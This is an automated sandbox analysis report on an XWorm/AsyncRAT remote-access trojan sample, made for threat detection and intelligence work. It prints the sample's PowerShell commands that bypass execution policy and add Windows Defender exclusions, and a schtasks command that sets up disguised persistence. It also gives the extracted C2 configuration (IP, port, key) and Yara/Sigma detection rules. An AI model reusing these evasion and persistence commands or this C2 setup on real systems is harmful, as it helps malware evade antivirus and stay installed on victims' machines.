Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1572730
MD5:2982d11d3b0789476831097f0e213007
SHA1:b2b7d5f73b65c3df4d3da8a5a266f47d3685a044
SHA256:bdff38ae5b6ac3ab4135894064d15e3ab14efe28b9463c98b185fb0cdfd3ad1f
Tags:NETAsyncRATexeMSILuser-jstrosch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3364 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2982D11D3B0789476831097F0E213007)
    • powershell.exe (PID: 1352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5240 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AzureConnect.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6968 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AzureConnect" /tr "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 2164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AzureConnect.exe (PID: 1772 cmdline: "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe" MD5: 2982D11D3B0789476831097F0E213007)
  • AzureConnect.exe (PID: 6540 cmdline: "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe" MD5: 2982D11D3B0789476831097F0E213007)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["127.0.0.1", "147.185.221.24"], "Port": 3804, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "xdwdUSB.exe", "Version": "XWorm V5.8"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_XWormYara detected XWormJoe Security
    file.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x8807:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x88a4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x89b9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x82b9:$cnc4: POST / HTTP/1.1

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x8807:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x88a4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x89b9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x82b9:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.2018283335.0000000000F22000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000000.2018283335.0000000000F22000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x8607:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x86a4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x87b9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x80b9:$cnc4: POST / HTTP/1.1
        Process Memory Space: file.exe PID: 3364JoeSecurity_XWormYara detected XWormJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.0.file.exe.f20000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.0.file.exe.f20000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x8807:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x88a4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x89b9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x82b9:$cnc4: POST / HTTP/1.1

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3364, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 1352, ProcessName: powershell.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3364, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 1352, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3364, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 1352, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3364, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 1352, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-10T19:46:25.070884+010028559241Malware Command and Control Activity Detected192.168.2.549818147.185.221.243804TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: file.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
            Found malware configuration
            Source: file.exeMalware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "147.185.221.24"], "Port": 3804, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "xdwdUSB.exe", "Version": "XWorm V5.8"}
            Multi AV Scanner detection for dropped file
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeReversingLabs: Detection: 78%
            Multi AV Scanner detection for submitted file
            Source: file.exeReversingLabs: Detection: 78%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: file.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: file.exeString decryptor: 127.0.0.1,147.185.221.24
            Source: file.exeString decryptor: 3804
            Source: file.exeString decryptor: <123456789>
            Source: file.exeString decryptor: <Xwormmm>
            Source: file.exeString decryptor: XWorm V5.8
            Source: file.exeString decryptor: xdwdUSB.exe
            Source: file.exeString decryptor: %ProgramData%
            Source: file.exeString decryptor: Program Files\Microsoft\AzureConnect\AzureConnect.exe
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49818 -> 147.185.221.24:3804
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: 127.0.0.1
            Source: Malware configuration extractorURLs: 147.185.221.24
            Source: global trafficTCP traffic: 192.168.2.5:49797 -> 147.185.221.24:3804
            Source: Joe Sandbox ViewIP Address: 147.185.221.24 147.185.221.24
            Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.24
            Source: powershell.exe, 0000000A.00000002.2577205128.000002015E5E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
            Source: powershell.exe, 00000002.00000002.2137614904.000001DB7BB30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros1
            Source: powershell.exe, 0000000A.00000002.2572896915.000002015E440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
            Source: powershell.exe, 00000005.00000002.2166015736.0000023991C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
            Source: powershell.exe, 00000005.00000002.2166015736.0000023991C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.ctain
            Source: powershell.exe, 00000002.00000002.2126110670.000001DB10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2221822786.00000239A3851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2354795322.0000023FB0271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2106136819.000001DB00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2169305461.0000023993A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2269885905.0000023FA0429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: file.exe, 00000000.00000002.3283038560.0000000003201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2106136819.000001DB00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2169305461.00000239937E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2269885905.0000023FA0201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2412375981.0000020146101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.2106136819.000001DB00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2169305461.0000023993A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2269885905.0000023FA0429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000002.00000002.2137177899.000001DB7BAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.o
            Source: powershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.2106136819.000001DB00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2169305461.00000239937E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2269885905.0000023FA0201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2412375981.0000020146101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000000A.00000002.2412375981.0000020146329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000008.00000002.2371240954.0000023FB85E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
            Source: powershell.exe, 00000002.00000002.2126110670.000001DB10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2221822786.00000239A3851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2354795322.0000023FB0271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2547077221.000002015616F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

            Operating System Destruction

            barindex
            Protects its processes via BreakOnTermination flag
            Source: C:\Users\user\Desktop\file.exeProcess information set: 01 00 00 00 Jump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: file.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.0.file.exe.f20000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000000.2018283335.0000000000F22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848F126E90_2_00007FF848F126E9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848F189560_2_00007FF848F18956
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848F197020_2_00007FF848F19702
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF8490030E92_2_00007FF8490030E9
            Source: file.exe, 00000000.00000000.2018283335.0000000000F22000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAzure.exe4 vs file.exe
            Source: file.exeBinary or memory string: OriginalFilenameAzure.exe4 vs file.exe
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: file.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.0.file.exe.f20000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000000.2018283335.0000000000F22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: file.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: file.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: file.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: AzureConnect.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: AzureConnect.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: AzureConnect.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: file.exe, Settings.csBase64 encoded string: 'j8FsyUQApJq+6c9MAWZVNdQ0wZQ3bgGH5HE1Z74lJ6SHLteq0/jjszqOv42Ve81S3WlYCNkiLb40hXQ6GtSekQ=='
            Source: AzureConnect.exe.0.dr, Settings.csBase64 encoded string: 'j8FsyUQApJq+6c9MAWZVNdQ0wZQ3bgGH5HE1Z74lJ6SHLteq0/jjszqOv42Ve81S3WlYCNkiLb40hXQ6GtSekQ=='
            Source: file.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: file.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: AzureConnect.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: AzureConnect.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@18/19@0/2
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AzureConnect.exe.log
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
            Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\QECkGQ6BhplKLGAd
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2164:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1264:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cu4dy5fs.0e4.ps1Jump to behavior
            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: file.exeReversingLabs: Detection: 78%
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
